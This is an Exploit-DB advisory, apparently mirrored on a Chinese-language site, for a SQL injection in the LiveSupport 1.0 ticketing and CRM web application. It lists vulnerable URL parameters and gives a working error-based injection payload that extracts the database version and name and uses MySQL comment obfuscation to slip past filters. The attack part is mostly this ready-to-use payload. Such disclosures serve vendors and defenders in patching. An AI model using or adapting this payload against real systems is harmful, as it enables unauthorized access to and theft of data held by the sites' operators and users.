LiveSupport 1.0 – SQL Injection

  • 作者: Ihsan Sencan
    日期: 2017-08-18
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/42488/
  • # # # # #
    # Exploit Title: LiveSupport 1.0 - SQL Injection
    # Dork: N/A
    # Date: 18.08.2017
    # Vendor Homepage : http://livecrm.co/
    # Software Link: https://codecanyon.net/item/livesupport-complete-ticketing-system-crm/20243447
    # Demo: http://livesupport.livecrm.co/livecrm/web/
    # Version: 1.0
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # #
    # Description:
    # The vulnerability allows the users to inject sql commands ...
    # 	
    # Proof of Concept:
    # 
    # http://localhost/[PATH]/index.php?Ticket[queue_id]=2&r=support/ticket/queue&id=[SQL]
    # 2&r=support/ticket/queue&id=22+/*!44455PrOceDure*/+/*!44455AnaLysE*/+(eXtrActvAlue(0,/*!44455concat*/(0x27,0x3a,version(),0x7e,database())),0)--+-
    # 
    # http://localhost/[PATH]/index.php?r=support/ticket-resolution/update&id=[SQL]
    # 
    # http://localhost/[PATH]/index.php?r=support/ticket/update&id=[SQL]
    # 
    # Etc...
    # # # # #